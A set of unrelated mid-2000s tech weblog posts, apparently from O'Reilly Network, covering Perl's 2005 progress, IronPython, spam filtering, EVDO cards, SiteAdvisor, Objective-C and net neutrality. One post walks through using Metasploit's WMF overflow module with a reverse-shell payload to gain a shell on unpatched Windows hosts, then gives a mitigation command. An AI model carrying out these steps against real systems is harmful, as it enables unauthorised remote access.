Related link: http://www.microsoft.com/downloads/details.aspx?FamilyID=94082d26-e689-4f7f-859b…

IronPython is a .NET implementation of Python, created by Jim Hugunin who is currently working for Microsoft. Jim didn’t specify a date when to expect 1.0 final, but he did mention that he’d prefer to keep it under 10 beta releases. As always, I’m happy to see the continued emphasis of CPython compatibility with this project. Microsoft takes a continual beating for “not playing nicely with others”, but I haven’t seen anything with the IronPython project that would lend itself to such criticism. I haven’t had a chance to install 1.0 yet. Maybe I’ll get to that next year…. :-)

Related link: http://www.perl.org/

A year is a surprisingly long and short time in the life of a software project. It may go by quickly, but when you review what actually happened, you may find that many things happened.

The theme for Perl in 2005 is one of rebirth. Several projects that looked dormant started again — not just technical, but social. While Perl may have entered the year a little slowly, it’s leaving 2005 much stronger.

Stable Releases

Perl 5.8.x pumpking Nicholas Clark announced last year that he intended to change the quarterly stable release schedule to once every four months. Unfortunately, real life intervened. Fortunately, his excellent work in making the 5.8.x series stable and usable continues. He released Perl 5.8.7 at the end of May. Few people have tested release candidates for future releases with their code or their modules — feedback is very important.

Hopefully next year will see more regular releases.

Despite the fact that stable releases bring bugfixes, newer versions of the core modules, and, as always, ever-improving test coverage, some businesses still stick with Perl versions that have gone unmaintained this millennium. Perl 5.004 is ancient, Perl 5.005 is old, and Perl 5.6.1 is creaky. If you’re deploying a new installation of Perl, please consider the latest stable 5.8.x release, or if you really need old software, at least Perl 5.6.2.

Upcoming Releases

Perl 5.10 pumpking Hugo van der Sanden, perhaps the kindest man in Perl, passed on the full pumpking to Rafael Garcia-Suarez, another candidate for the title of “the kindest man in Perl”. Unfortunately, this means that Hugo is unlikely to tackle the proposed and much-anticipated rewrite of the regular expression engine.

Perl 5.10 will be impressive, though. Proposed new features include:

• the defined-or operator, ported from Perl 6
• a smaller memory footprint, with much slimmer internal data structures
• an improved Switch module with smart matching and no source filtering
• assertions
• a lexical $_
• variable names in uninitialized value warnings
• a new pragma, feature, which allows you to use features from Perl 6
• more tests
• updated core modules
• continual improvements to the internals, thanks to Ponie
• regexp trie optimizations (especially thanks to Yves Orton)
• a somewhat cleaner and safer API (thanks to Andy Lester and cleanup patches)

New features planned for inclusion are:

• integrated Module::Build (and perhaps CPANPLUS)
• proper lexical pragmas
• state variables, as found in Perl 6

There’s no timetable yet on the 5.10 release, but there’s a sense that it’s getting close to the time to think about such things. Pumpking Rafael Garcia-Suarez plans to release the 5.9.3 development version just after the start of the year.

Notable Modules

Adam Kennedy continued the Australian domination of the weird on the CPAN, releasing PPI 1.0 — an independent Perl parser that can parse Perl without running it. PPI makes a lot of things possible — better IDE integration, refactoring, automated style guides, et cetera. Still, only perl can still parse every Perl file especially when you get into areas where the other crazy Australian hacker has been.

Which other crazy Australian hacker? Damian Conway. He did not rest this year either. In conjunction with the release of his new book, Perl Best Practices, he released several modules to help you write code well. One of the most interesting is Class::Std, which itself touched off a few debates on Perl Monks about the use, abuse, value, and implementation of inside-out objects. Though Class::Std itself may not be the ultimate and final way to write clean, maintainable, and performant OO code in Perl 5, it does show why Damian’s a master Perl hacker. Would you have considered inside-out objects if he hadn’t written it?

The web world has seen some work too. Simon Cozens’s Maypole has new maintainership and new evolution. The spinoff project Catalyst has a lot of activity, excitement, and open job requests. Of course, CGI::Application is still vital and valuable, and Randal Schwartz’s CGI::Prototype takes a new approach.

There’s no standout Ruby on Rails killer yet, as much as Catalyst would like to claim that title. Perhaps the Jifty project from Jesse Vincent and Best Practical will be the right blend of database magic, cleanliness, and intelligent defaults. Certainly its use of continuations is very compelling.

Curtis “Ovid” Poe’s Class::Trait is also compelling, bringing the designish goodness of Perl 6 roles to Perl 5 in a very Perl 5 way.

The venerable object-relational mapper Class::DBI has some healthy competition in the form of DBIx::Class and Rose::DB::Object. The Class::DBI::Sweet extension is a worthwhile complement. Tangram is still around too… and Jifty::DBI might possibly make Rails’s ActiveRecord look verbose and clunky, at least when it gets a little more documentation.

Perl 6

2005 was yet another year for Perl 6. “When will it be out?” you ask. “Sooner, if you help” the designers and implementers and true believers still answer. After struggling for a few months, sooner really is, well, sooner.

Allison Randal, president of the Perl Foundation and project manager of Perl 6, stepped back from both positions to devote more time to coding. Jesse Vincent replaced her as the day-to-day project manager of Perl 6 and now spends his time attempting to elicit progress reports from developers and asking both “What’s blocking you?” and “Are you having fun?”

So far, it’s working ever better.

Parrot Reborn

Parrot hit a low point late last year, with several unanswered design decisions, a lack of direction, and arguments on the list replacing actual working code. Citing a lack of motivation and time, longtime designer Dan Sugalski stepped down and Perl 5.004 pumpking emeritus Chip Salzenberg surprised many people by volunteering as a replacement.

Though Chip has spent several months fighting a persistent (and, in the opinion of your editor, unfair) legal battle (see GeeksUnite), he’s also reviewed several pending design decisions and started to meet the mini-milestones on the way to completing Parrot’s design and implementation. For example, calling conventions have improved (yet again, but this time they fixed the sticky continuation issue) and the lexical implementation works.

Thanks and well-wishes go to Dan for several years of tireless and often thankless work. Thanks and well-wishes also go to Chip and Parrot Pumpking Leo Toetsch for their existing service and in anticipation of even more good work.

In semi-related news, the Dutch foundation NLnet generously sponsored two milestones of Parrot development, enabling both Chip and Leo to devote paid time to the project. These two milestones include nine critical subsystems. The developers finished two in 2005, leaving seven to go. (Thanks to Mark Overmeer for corrections here.)

Pugs

No one could have known at this point last year that a working Perl 6 prototype implementation was only a couple of months away, for various “in one sense or another” definitions of the word “working”. The Taiwanese world-traveler Audrey “Autrijus” Tang sparked a near-revolution in two ways. First, by making actual Perl 6 code run with a few weeks of hacking and second, by demonstrating a guided near-anarchy development style that brought new energy, new questions and ideas, and, more importantly, new contributors to the Perl 6 development process.

You may have thought that Perl 6 would only run atop Parrot, but would you believe that it may run on JavaScript, Java, and even Perl 5? Back in February 2005, who could have guessed that you can embed both Parrot and Perl 5 in Pugs, so as to run existing CPAN modules with Perl 6 code?

The project has been exceedingly liberal in granting commit bits (to the point of answering all bug reports and feature requests not with “patches welcome” but “if you check in a test, someone will add the feature”), even to the point of offering commit bits to Python designer Guido van Rossum (who kindly declined).

The roaring velocity of Pugs did slow somewhat after the normal conference season, but lately work has started again on the infrastructural features necessary not only to produce Parrot-compatible code but to support all of the amazingly powerful but conceptually complex features of the Perl 6 object system. Oh, and it looks very likely that the Pugs solution to connecting to Parrot will help the rest of the Parrot and Perl 6 compiler tools evolve and grow too.

Synopses

In the beginning, there were Perl 6 mailing lists and Requests For Comments. Then Larry began synthesizing and producing long, weighty Apocalypses. Damian followed, extracting the practical wisdom from the Apocalypses to produce practical code examples in Exegeses.

When it’s too much work to build thirty pretty great pyramids to show how to build a Really Great Pyramid, pass around blueprints instead.

Now the Apocalypses and Exegeses have become historical curiosities (for various comedic misspellings of the word “hysterical”). The Perl 6 Synopses are the new Apocalypses, except shorter, more accurate, and more up to date. (Pity the poor Perl.com editor who tries to keep Larry’s hundreds of thousands of words current. That’s a hypothetical editor, by the way, because the one you have now just doesn’t.)

Fortunately for mere mortals who lack Larry’s and Damian’s metaphysical ability to hoist great blocks of metaphorical sandstone into place during the Nile delta’s dry season, the Synopses are also easier to read and digest.

PGE

Patrick Michaud, Perl 6 pumpking, released the Parrot Grammar Engine early this year. This is (now) a set of Parrot libraries implementing rules (as described in Apocalypse, Exegesis, and Synopsis 5). PGE not only provides regular expression support to all languages hosted on Parrot but it forms the basis of the grammar engine used to build Perl 6.

This has lead to small cleanups in Parrot, namely removing the experimental and long underused regular expression operations.

Patrick’s first cut at the grammar engine was a prototype written in C. The current version is a port of that to PIR, the “native language” of Parrot as far as Parrot has a native language that you might actually use to write programs. Perhaps it’s a compliment to the design of PIR that Patrick considers this version more maintainable and cleaner than his prototype.

Of course, PIR is an object oriented assembly language with higher-order functions and aggregate data structures.

The next step in the process is a shift-reduce parser. As of the last report, Patrick’s code can parse Perl 6 expressions. That leaves the rest of the compiler tool suite to transform the parse tree into code that Parrot (or any other compatible backend) can execute.

A Compiler Roadmap

Speaking of the compiler tools, Allison Randal published her ideas on how to build the full compiler suite for Perl 6 while making the same tools available to any other language hosted on Parrot. In particular, the approach seems to be to perform a series of tree transformations (see “attribute grammars”) to turn the output from PGE and the language parser into syntax trees which various tools can analyze, annotate, optimize, and translate into Parrot’s AST input format.

Allison’s Punie project (which bears some relation to a failed project your editor started a couple of years ago) has succeeded in running a subset of Perl 1 code (you read that correctly) through the entire compiler suite. Perl 1 now runs on Parrot and passes a few tests. At least, part of Perl 1 does, with more on the way.

Though that sounds frivolous, Perl 1 is a real language, if somewhat simpler than Perl 6. If Parrot and the compiler tools work to run Perl 1 programs (and its test suite), it validates the design decisions for the process. It’s also a small project with no particular pressure to succeed on its own merits, the nice poetic joy of working aside.

Miscellaneous

Larry recently revealed that he has almost completed a Perl 5 to Perl 5 translator. That may seem flippant and silly until you realize that he’s modified the Perl 5.9.2 parser and lexer to save all of the information — including whitespace and comments — it normally throws away. He can reconstruct the original Perl 5 program from an annotated parse tree.

If he can emit working Perl 5 code, he can emit working Perl 6 code.

It may not be perfect (the latest estimate is that it handles 97% of the core Perl code correctly), but even if it only works for 95% of your code, that’s still 95% of your code you don’t have to translate by hand.

Audrey Tang and Ingy döt Net (you thought your editor had an odd name) might have a similar project up their collective sleeves, too.

Nicholas Clark, wearer of many hats, officially retired as the Ponie pumpking. He and Jesse Vincent have put out a call for a new Ponie pumpking to work with Nicholas to continue porting Perl 5.10-to-be to Parrot.

Social

There’s little point in participating in the Perl community without a community. There may be code out there, but unless people can work together, the code isn’t as useful or as well-used as it could be. Fortunately, 2005 was a good year.

Revamping TPF

The Perl Foundation doesn’t lead the Perl community. Its mission is to help things happen when it can, whether by organizing events and donations or to find the right people to fund for projects.

One common concern in recent years has been that TPF seems awfully quiet, apart from issuing a press release about Perl 6 once in a while. This illustrates a sort of truism in open source development. Ideas are cheap. Implementors are worth their weight in gold. After several years of overworking the same volunteers, TPF has recruited new volunteers and harnessed their energy and ideas to revamp the group.

In particular, Bill Odom (the man who knows practically everyone) is now the new TPF president. Jim Brandt, the primary organizer of 2004’s successful YAPC::NA in Buffalo, is the new chairman of the YAPC committee. Andy Lester is in charge of PR and grant manager Curtis “Ovid” Poe is now the head of the Grants Committee. Richard Dice, who lead the organization of this year’s YAPC::NA in Toronto, replaced Bill Odom as the chairman of the steering committee.

That doesn’t mean that everything TPF could possibly do has someone ready, willing, and able to do it — if you’d like to make the Perl community a little better and have the time and energy and commitment to make it so, TPF could use your help!

TPF also launched The Perl Foundation group weblog for its volunteers to communicate with the broader Perl community about what the Foundation is doing, how it’s doing it, and why.

Google’s Summer of Code

Does anyone remember an Internet before Google? Even if you do, the 800-exabyte gorilla doled out a cool couple of million dollars to sponsor college and graduate students to increase the amount and quality of open source code in the world. Perl had eight projects participating this year.

Leon Brocard kept an eye on all of the projects and posted interviews with each Summer of Code Perl grant recipient.

TPF Grants

In addition to Adam Kennedy’s PPI project mentioned earlier, TPF funded Ivan Tubert-Brohman to build AnnoCPAN. Ivan’s site mirrors the documentation of CPAN modules while allowing users to annotate sections that are confusing or unclear, or to add additional notes where possible. Novices often compare Perl’s documentation to that of PHP.net; this is one place to improve and surpass that example.

Ivan launched AnnoCPAN just before YAPC::NA in Toronto. With all of the spare time and goodwill he earned, he immediately set to work making the Perl documentation better indexable.

A Conference for All Seasons

Several YAPCs took place this year, including those in Toronto, Israel, Portugal, and somewhere in Asia. There were also hackathons all over the globe (wherever Audrey Tang is, there’s a hackathon), workshops, weekends, and various Perl monger meetings.

Miscellaneous

The Perl 5 list summaries restarted.

The Perl 6 list summaries did not stop, so they did not restart.

Everything Else That Didn’t Fit Into a Parallel Top-Level Heading

CPAN celebrated its 10th anniversary. Take that, pretty much every other language. See you on Parrot.

Did I miss something? Do you want to try prognosticating? What was significant to you? Let us all know right here.

Related link: http://acmqueue.com/modules.php?name=Content&pa=showpage&pid=346

It’s too easy for determined minorities, acting outside the social
pale, to ruin things for the rest of us. Several neighborhoods in
Boston, for instance, are struggling to contain gang activity that
took 75 lives this past year. How can a community preserve itself when
it has no control over a small number of disrupters?

Unsolicited bulk email is a comparable situation: most of us want to
reach other people with email messages of mutual benefit, but we’re
overwhelmed by those misusing the system.

The solution is to act together, which software and Internet
connections allow us to do.

Filtering gets a boost from a reputation system developed originally
as an open-source tool (Razor) and then as a commercial product called
Cloudmark. (The desktop version is available only for windows, but
the server and gateway versions support Linux and Solaris too.)

The concept behind the system is simple enough: if several other
people think something is spam, you probably feel the same way. A
worldwide coordination system works much better than millions of
individuals trying to flag spam on their own.

The key to the reputation system–as to any reputation system–is
bootstrapping. You need good data to start with. In this case,
Cloudmark has signed up a few trusted individuals to put the first
ratings in place. As they continue doing ratings and other people sign
up, the system monitors itself. If any spammer decides to throw in
false ratings, he is quickly isolated and demoted so that he has no
effect on further ratings. This is a clever combination of manual,
human intervention and automated support.

I’m sitting on Delta 1400 (Salt Lake City to San Jose) waiting for the boarding door to close, and I’m on the internet.

Yesterday I got a Kyrocera KPC650 EVDO card from Verizon. Actually, I got the Audiovox PC5740, but when I got it home I discovered I couldn’t immediately use it with a Mac since the install CD didn’t have Mac support (and never claimed too, actually). I found instructions on modding Tiger to use the PC5740, and that works save for the step where I have to activate the card. Fellow Stonehenge trainer Tad McClellan booted his linux laptop into Windows and we gave it a go, but it wanted the Windows install CD to get drivers. Thank god Mac OS X usually has the the drivers I usually need already installed.

I took the PC5740 back to Verizon and exchanged it for the KFC650. The customer service guy asked me who sold me the much cheaper PC5740 because someone should have sold me the more expensive and better KPC650. Indeed, in my googling, everyone was saying the same thing: get the KPC650.

I could mod Tiger in the same way I did for the PC5740, but I ran into the same problem: I need a Windows machine to activate the card (if I want to use the Verizon software that came with the card).

Booster-Antenna.com has a Mac version of the VZAccess software to activate the card, install the right things, and manage the card while I use it. I had to pay another $75 for it, but that’s better than tracking down a networked Windows box with a PC card slot.

They’re closing the door so it’s time to go. :)

HD Moore has released a module for the Metaploit framework targeting the “Windows XP/2003 Picture and Fax Viewer Metafile Overflow” vulnerability. Here is how easy it is to exploit this now:

1) Download the latest Metasploit 2.x Snapshot
2) Run ./msfweb
3) Point your web browser to http://127.0.0.1:55555
4) Click on “Windows XP/2003 Picture and Fax Viewer Metafile Overflow”
5) Click on “Automatic - Windows XP / Windows 2003 (default)”
6) Select a payload. For example, “win32_reverse”. Make sure you have your firewall turned off, or have a rule allowing incoming connections to port 8080 (or whatever port you choose)
7) Click on “-Exploit-”
8) From an un-patched (this is easy as of today, since there is no official patch for this vulnerability) Windows XP or 2003 host, use Internet Explorer browse to http://[ip]:8080/anything.wmf where [ip] is set to the ip-address of the host running Metasploit.
9) Your Metasploit browser session should now output details:

10) Click on the “Session [number]” link, and you now have shell access to the Windows host! Type in the DOS command of your choice, for example “ipconfig” in the screenshot below:

Lets hope there is a official patch released soon! Meanwhile, disable actions on the .wmf extension. Here are instructions on how to do this from the advisory: on the Start menu, choose Run, type "regsvr32 -u %windir%\system32\shimgvw.dll", and then click OK.

Related link: http://www.siteadvisor.com/previewsignup

Technology is a big part of the security problem. Technology is very effective and efficient, and it gets the job done. However, the inner-workings of technology are rarely, if ever, revealed, to describe how it gets the job done. I asked many people the questions: “Do you know what happens to your credit card when you complete an order on Amazon.com?” or “Do you know what happens to your vote when you cast your vote electronically?” The response is usually: “I don’t know.”

Likewise, when you visit a website, you usually do not know what goes behind the scenes of that site. Is the intent of the website malicious? What are the downloads associated with the website? Is the website notorious for sending annoying e-mails to you? Does the site link to other questionable websites? It takes months and years to have a certain degree of trust for a website. But even then, you still do not have much knowledge of what really goes on behind the website, and disclosure is normally not very prominent.

There is a new web browser plugin that will alleviate many concerns. Meet SiteAdvisor. The SiteAdvisor plugin is currently in the beta-testing phase. The simple premise of the plugin is to identify whether a website is safe or unsafe. The plugin is available for Microsoft Internet Explorer, and Firefox (on all platforms as I tested). Once installed, it serves as a signal light on your browser. When you visit a safe site, the light is green. If you visit a questionable or malicious site, the light is red.

Above: The O’Reilly Network website is a safe site.

It also aids searching. There will be a green check icon on safe search results, and a red “X” icon on unsafe results. Try searching for file sharing in Google.

Above: Search results for “file sharing” in Google.

However, the plugin goes beyond identifying whether a site is safe or unsafe. You can also see the e-mails sent by the website, the downloads and executables associated with the website, and an analysis of links to other websites from the current site.

Above: E-mails and downloads associated with the O’Reilly Network website.

Above: Link analysis map for the O’Reilly Network website.

Websites can be looked at as black holes. Very rarely, you know what happens when you submit your e-mail address to the website: it may be used for more than just sending newsletters. When you download a piece of software from a website, you may be getting more than you ask, or don’t ask, for. SiteAdvisor is more than a good aid for web surfing. It aims to disclose information about websites through iterations of automated testing and user comments. Even their FAQs is very well written to disclose the changes to your operating system after the plugin is installed (e.g. registry changes). Awareness is still a persisting problem in information security. Informing users on how privacy can be violated, downloads that are malicious, and other annoyances before they happen goes a long way, and prevents fear and headaches.

Has anyone gotten monodevelop to work via fink? For me, it’s been broken for months now. I’ve been ignoring the hi-color theme warnings, I doubt if thats whats causing the SIGSEGV. Let me know if you know of a solution.

$ monodevelop

(MonoDevelop:3121): Gtk-WARNING **: Could not find the icon 'gnome-fs-regular'. The 'hicolor' theme
was not found either, perhaps you need to install it.
You can get a copy from:
http://freedesktop.org/Software/icon-theme/releases
10769 [25977856] INFO MonoDevelop.Core.ILoggingService (null) - Initializing service: MonoDevelop.Core.PropertyService
10866 [25977856] INFO MonoDevelop.Core.ILoggingService (null) - Initializing service: MonoDevelop.Core.FileUtilityService
11264 [25977856] INFO MonoDevelop.Core.ILoggingService (null) - Initializing service: MonoDevelop.Documentation.MonodocService

=================================================================
Got a SIGSEGV while executing native code. This usually indicates
a fatal error in the mono runtime or one of the native libraries
used by your application.
=================================================================

Stacktrace:

in <0xffffffff> (wrapper managed-to-native) Gtk.Dialog:gtk_dialog_run (intptr)
in <0x84> (wrapper managed-to-native) Gtk.Dialog:gtk_dialog_run (intptr)
in <0x38> Gtk.Dialog:Run ()
in <0x34> MonoDevelop.Core.Gui.Dialogs.ErrorDialog:Run ()
in <0x964> MonoDevelop.Ide.Gui.IdeStartup:Run (string[])
in <0x228> MonoDevelop.Core.AddIns.AddInService:StartApplication (string,string[])
in <0x38> MonoDevelop.Startup.SharpDevelopMain:Main (string[])
in <0x68> (wrapper runtime-invoke) System.Object:runtime_invoke_int_string[] (object,intptr,intptr,intptr)


Update: After giving some though to one of the responses to this entry below, I have decided to take down the email thread between Jobs and myself. I have no way of knowing if Jobs would be OK with me posting the e-mail publicly, even though the contents of the e-mail didn’t contain anything private or sensitive.

That said, I’d like to turn this entry into a discussion of what people think of having to use Objective C to code Cocoa applications. Feel free to comment below. Here is my take on the subject: “Although I am a die-hard Apple and OSX fan, I’ve never cared for Objective-C much. As far as the development world is concerned, it is my opinion that Microsoft has done wonderful things with .NET, while Apple hasn’t churned out much innovation (not recently at least.) I’d like to see Apple developers gain more choice. With every iteration of OSX, there seems to be so much effort put into innovation of desktop components, but the development environment is age old. I use Objective C because I have to, while I use recent languages such as C# and ruby because I want to. Take look at with Microsoft is doing with .NET: you can write your own .NET compiler - you just have to make sure it spits out the required IL code. It’s beautiful and elegant, and you aren’t locked onto one language. It’s managed, and therefore a bit more expensive, but unless you are writing real time code, it doesn’t matter today: it’s not _that_ slow for writing most desktop applications. In short, I’d love to see Apple investigate managed code, and perhaps help bind Cocoa with more interesting and fun languages.”

Update2 (12/27/2005): Thanks to those who commented below - most of the comments have been quite constructive and I’ve enjoyed reading them. I’d like to add the following notes to supplement my views:

1) I am not suggesting Apple carbon copy .NET and port it to the OSX as is. I am suggesting that Apple put in some resources to investigate the innovations and choices (C#, Python, etc can be used to spit out .NET assemblies. It is possible to write a compiler for .NET as long as they adhere to the IL specification - this is what I mean by more choice) offered by .NET and similarly offer it’s developers more choice. I am suggesting that Apple take a _lead_ with offering its developers new paradigms of creating applications. Feel free to comment on your like or dislike for .NET and compare C# to Objective-C if you must, but you’d have lost the gist of my argument.

2) I do not agree that .NET is ‘too slow’ or only useful for developing quick and dirty solutions. I have come across a _lot_ of good enterprise level implementations of applications coded in .NET. Please don’t attempt to convince me that .NET doesn’t work for enterprise level applications - I have seen otherwise.

3) I do not agree with the “If its not broke, don’t fix it” argument. This is an extremely dangerous argument. It limits progress and innovation. For example, Panther was a great iteration of OSX - why did Apple have to work towards Tiger? If one were to accept the “don’t fix it” argument, Apple shouldn’t have released Tiger, and Apple doesn’t need to release any more iterations of OSX. Everything seems ‘not broke’ with Tiger today, why bother? The answer: innovation. There has got to be a non-stop iteration of improvements. Apple hasn’t disappointed me with progress made towards OSX desktop components, and so I’d be happy to see a stronger push towards more choices and newer methods of development.

4) I do not agree with assertions along the lines of “Objective-C is the best. There is nothing better.” Language preference is a matter of _taste_, and this cannot be forced upon anyone. _You_ may like the Objective-C way of doing things, but _I_ prefer newer languages such as ruby and C#. I am suggesting Apple investigate and put in efforts towards giving people more choice. There is no doubt in my mind that more developers will be enticed into developing for the OSX platform if they had more choice. Also see 7)

5) I am not suggesting Apple abandon Objective-C. Clearly, it has a tremendous fan following.

6) I am aware, and I appreciate many community related efforts towards bridging Cocoa with other languages. However, many of these are incomplete, and I’d be delighted if Apple chose to sponsor similar efforts.

7) As with .NET in 1), my example of ruby is just that - an example. I am not insisting that Apple only bind languages such as ruby and C# to Cocoa because I happen to like them. I am suggesting that Apple take a look at how these languages are improving the lives of developers. For all I care, Apple could come up with a brand new language after drawing inspiration from recent innovations of ruby and the like.

8) I am not suggesting that Apple has made no progress in the past few months. For example, I am aware of new solutions such as Core Data and Core Image to name a few.

To sum it up: Apple has blown me away with it’s innovation with desktop components. For example, after having used Expose with hot-corners, I can’t imagine life without it. I’d like Apple to channel some energy towards giving it’s developers more choice of languages, and perhaps learn a thing or two from efforts such as the .NET environment and the ruby language.

Perhaps I should’ve posted the above with my original post, but I had no idea I was going to get Slashdotted. I’ve enjoyed most of the comments - but the amount of responses has been quite overwhelming. Much appreciated though!

Want to flame me for criticizing Objective-C? This is the place to do it!

Episode 5 of Systm is based on the Asterisk project (open source PBX software). They also mention Hitachi’s wireless IP phone. Very informative and highly recommended!

For 3 years, I had the opportunity to work from home. I would travel to client locations as needed, and enjoyed the freedoms of a true and ideal consulting lifestyle. During this time, I felt I was most creative, for I had the energy to author two books, articles, and speak at information security conferences around the world. During that time, I felt I was a member of the ‘cafe environment’ Mark Morford describes in his article “Why Do You Work So Hard?“:

Call it “the cafe question.” Any given weekday you can stroll by any given coffee shop in the city and see dozens of people milling about, casually sipping and eating and reading and it’s freakin’ noon on a Tuesday and you’re like, wait, don’t these people work? Don’t they have jobs? They can’t all be students and trust-fund babies and cocktail waitresses and drummers in struggling rock bands who live at home with their moms.

Of course, they’re not. Not all of them, anyway. Some are creative types. Some are corporate rejects. Some are recovering cube slaves now dedicated full time to working on their paintings. Some are world travelers who left their well-paying gigs months ago to cruise around Vietnam on a motorcycle before returning to start an import-export business in rare hookahs. And we look at them and go, What is wrong with these people?

It’s a bitter duality: We scowl at those who decide to chuck it all and who choose to explore something radical and new and independent, something more attuned with their passions, even as we secretly envy them and even as our inner voices scream and applaud and throw confetti.

Our culture allows almost no room for creative breaks. There is little tolerance for seeking out a different kind of “work” that doesn’t somehow involve cubicles and widening butts and sour middle managers monitoring your e-mail and checking your Web site logs to see if you’ve wasted a precious 37 seconds of company time browsing [censored]…

These days, however, I am stuck with a routine 9 to 5 lifestyle. Add to that office politics, _ridiculous_ controls and procedures, the daily work commute routine - and I am left with no energy or the will to embark on anything creative. It does appear that the routine corporate environment does not suit me well, and I will have to negotiate some changes soon in order to revert back to my older lifestyle.

If you haven’t had a chance to read Mark’s article, I do recommend it highly. I will end this entry with the following quote from the column:

We are designed, weaned, trained from Day 1 to be productive members of society. And we are heavily guilted into believing that must involve some sort of droning repetitive pod-like dress-coded work for a larger corporate cause, a consumerist mechanism, a nice happy conglomerate.

Related link: http://groups.google.com/group/comp.lang.python/browse_frm/thread/32dc95bd671542…

Alex Martelli stated on the thread:

I don’t think there was any official announcement, but it’s true — he
sits about 15 meters away from me;-).

I’m happy and excited for Guido. I’m interested to hear what exactly he’ll be working on over there and how this could impact Python. Maybe it’s my optimism kicking in, but I expect it will be positive for the community. I’m sure people can point to an incident here or there where Google has been questionable in its “don’t be evil” motto, but I believe that overall, they’re doing a good job of maintaining credibility.

Anyway, congrats, Guido!

Is Guido’s move to Google a good thing for Python? Share your thoughts.

I missed the last several episodes of Battlestar Galactica earlier this year. No big whoop. I often complained about the underwhelming story and lack of serious robot whup-assing. I figured the SciFi Channel would just show them over and over again. They didn’t. Oh well.

When iTunes announced TV show downloads, I didn’t pay attention to that too much either. I don’t like that much on TV, and not anything in iTunes. A week or so ago, they added Battlestar Galactica and last night I thought I finally had an excuse to check it out. If the SciFi Channel isn’t going to show them again, I might as well buy them. I bought the episodes I missed ($1.99 each) and caught up. I’m not sure it was worth the $6, but that’s how it goes. I’ll be ready for season three.

When I got home this morning, I noticed the red recording light on the TiVo. No big whoop. It happens. I kept noticing it all day though. Just what are you recording all day, roboTV?

It turns out the SciFi Channel played the entire second season of Battlestar Galactica today. I could have saved my $6. Curses!

Related link: http://online.wsj.com/public/article/SB113435260241219853-o_bxQIb0Tesryll_Bt9fq7…

Gates has floated the idea of sharing ad revenue with search users, and Google has concurred. Sounds like an effective way to redistribute wealth without selling a darned thing. I wonder what advertisers would think?

This comes to us from the 12/12 Wall Street Journal:

“We’ll actually go to users and say instead of us keeping all that ad revenue, we’ll actually share some of it back with the user,” said Mr. Gates, according to a transcript supplied by Microsoft. “The user essentially will get paid, either money or free content or software things that they wouldn’t get if they didn’t use that search engine.”

Google replied:

“We’re always looking for ways to make our users’ search experience more satisfying, including paying users for searching with us,” Google said in a statement.

Here I was already worried about the misalignment of interests between advertisers and Google, et. al. These new suggestions would turn that misalignment to almost 180 degrees.

As they mature, I believe that online ad services must work to improve their credibility with advertisers, not erode it. If I were an advertiser, I would want:

• to see a strong, active policy against click fraud,
• some transparency into the click cost mechanism, and
• click audit features.

That is, some assurance I’m getting high quality clicks. Maybe even a transparent ‘click quality index’ that quantifies these factors (and adjusts click cost to suit). Paying users to read/click ads would draw the lowest quality ad clicks.

---

Skeptical advertisers might appreciate my own quid pro quo social ad service: LinkLike.

Related link: http://www.chrisdolan.net/talk/index.php/2005/11/14/private-regression-tests/

One of the nicest things about being an open source developer is that other free software developers often make good development tools. Chris Dolan’s recent weblog on Private Regression Tests shows how to use some of them to make the job of releasing high-quality software easier. No, this isn’t about distributing tests with your software. It’s about using the same testing tools you already know to use to automate all of the things you know you need to do.

What’s in your directory of private tests?

Related link: http://groups.google.com/group/turbogears-announce/browse_frm/thread/b960a318531…

For anyone unaware of what TurboGears is, TurboGears is a Python web development framework which supports and encourages an MVC style of development. It is not so much a new project as it is the compilation of existing projects, namely, CherryPy, SQLObject, Mochikit, and Kid template.

I think this is really great news for TurboGears as well as Python in general. TurboGears is quickly gaining publicity and users because it is really easy to get stuff done. A book deal lends even more credibility to the project as well as a great entry point for new users. I think that showing users how easy it is to get work done with TurboGears implies ease of programming in Python for general computing tasks, so this is good all around. I look forward very much to getting this book on my shelf. Too bad they’re getting published by the “wrong” publisher :-)

If you haven’t checked out TurboGears and you do any sort of web development, you should really at least give it a glance.

Related link: http://www.oreilly.com/catalog/timemgmt

One of the books I edited this fall was Time Management for System Administrators by Tom Limoncelli. As a former sysadmin this book really spoke to me, which is exactly what Tom intended. What Tom probably didn’t intend was how often I found myself telling my wife how she (or I) should implement one of Tom’s time tips. Often in the middle of a discussion I would see a chance to impart some of Tom’s wisdom to her and I would say, “Well, you know what Tom would say…?” And then I would tell her one of his time tips.

You see, despite Tom’s best efforts to make this a book exclusively for system administrators, it can’t escape the fact that it has solid, sensible, and useful time management advice. (If this weren’t the case we never would have published it.) The copy-editor and production editor who worked on the book both found it very insightful, even though they don’t speak geek. My wife always nods when I give a time tip and comments, “That seems like a good idea.”

Probably none of these non-techies will heed Tom’s advice. I say this because time management involves at least two things. One is knowing what you ought to do. The second is doing it. How you get from one to two is by being motivated. And Tom’s book is not written to motivate anybody other than a sysadmin. And I think this is its strength. Instead of wasting pages talking about generic situations that can apply to anybody in an office environment, Tom speaks directly to the harassed, overworked, and underappreciated system administrator.

If this description of the book isn’t enough to motivate you, then you should know that in the life goals chapter Tom talks about how to date a porn star. I wanted to cut this out (I feared offending people) and so did the copy-editor, production editor, and my wife. Tom said no, and to trust him. He knows how to motivate a sysadmin.

Related link: http://www.lispniks.com/cl-gardeners/

I chided a few Lisp advocates in Why Lisp Still Hasn’t Won, so let me now praise the greater number of Lisp advocates who are participating in the Lisp Gardeners project to improve Common Lisp for novices and experts alike. Things look very good so far — it’s very heartening to see a real community form to address a few technical issues (and in the process, solve a few more difficult social ones). Keep up the good work!

What would make you consider (or go back to) Common Lisp?

(Originally published in the
American Reporter.)

The Internet was the great noncommercial success story of our time.
Commissioned by the government, built on open-source software,
promulgated initially through research and academic facilities–the
Internet was the crowning example of a public good, a resource without
an owner, a self-regulating convocation of equals.

All that seems threatened now. This month, local phone companies
revealed a far-reaching change to Internet access. These companies,
who control the line into the Internet users’ homes (usually through
ADSL connections over traditional telephone wires) want to create
varying levels of service for Internet content of their choice.

They plan to reserve high-speed connections for content they serve up,
or that they accept from entertainment firms and other commercial
companies willing to pay. All other content (originating from sites
such as this one, the American Reporter) will receive poorer service.

And if the phone companies can do it, cable companies (the other major
providers of Internet service to end-users) could very well start
doing it too.

Those who hail the open Internet cringe at this initiative, which
exploits the Internet to build and market private, premium content.
But this is is by no means the first time companies have tried to bend
technology to favor their services. In fact, it’s an old story.

As I’ll show in this article, companies have been trying to position
themselves at choke holds and manipulate the Internet since it became
commercialized in the early 1990s. Such shenanigans are simply an
exercise of market power. Up to now they have failed to change the
essential nature of the Internet. If they threaten to do so, opponents
can invoke regulatory power and antitrust law to fight them.

